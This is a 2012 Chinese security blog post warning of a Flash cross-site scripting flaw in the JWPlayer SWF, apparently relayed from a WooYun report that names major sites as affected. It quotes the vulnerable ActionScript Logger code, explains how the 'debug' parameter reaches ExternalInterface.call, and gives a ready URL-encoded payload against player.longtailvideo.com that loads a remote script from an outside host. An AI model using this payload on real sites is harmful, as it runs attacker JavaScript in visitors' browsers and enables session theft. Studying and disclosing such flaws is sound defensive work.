Flash xss预警。

在乌云看到的。目前发现各大网站都存在,百度、猫扑、英特尔、腾讯……

A Xss vulnerability in JWPlayer

Test Browser: IE , Firefox.

Test Platform: Win 7.

1. The Bug code in

package com.longtailvideo.jwplayer.utils
class Logger
private static function send(_arg1:String):void

if (ExternalInterface.available){
ExternalInterface.call(_config.debug, text);<—directly use _config.debug
};

2. The _config.debug is directly used as the first parameter of ExternalInterface.call. And the _config is loaded from loaderInfo.parameters. Therefore, when we construct a link such as ” jwplayer.swf?debug=(function(){alert(‘xxx’)})() “, the passed-in javascript code will be run.

3. Then we can use the trick location.href=’javascript:”<script src={js file url}></script>”‘ to load and run external javascript file.

Test encoded evil code:

http://player.longtailvideo.com/player.swf?debug=(function()%7Blocation.href%3D'javascript%3A%22%3Cscript%2Fsrc%3D%5C'%2F%2Fappmaker.sinaapp.com%5C%2Ftest5.js%5C'%3E%3C%2Fscript%3E%22'%7D)

 

本文固定链接: https://www.unhonker.com/bug/599.html | 90' s Blog|关注网络信息安全

该日志由 unhonker 于2012年05月16日发表在 漏洞公布 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: Flash xss预警。 | 90' s Blog|关注网络信息安全

Flash xss预警。:等您坐沙发呢!

发表评论

您必须 [ 登录 ] 才能发表留言!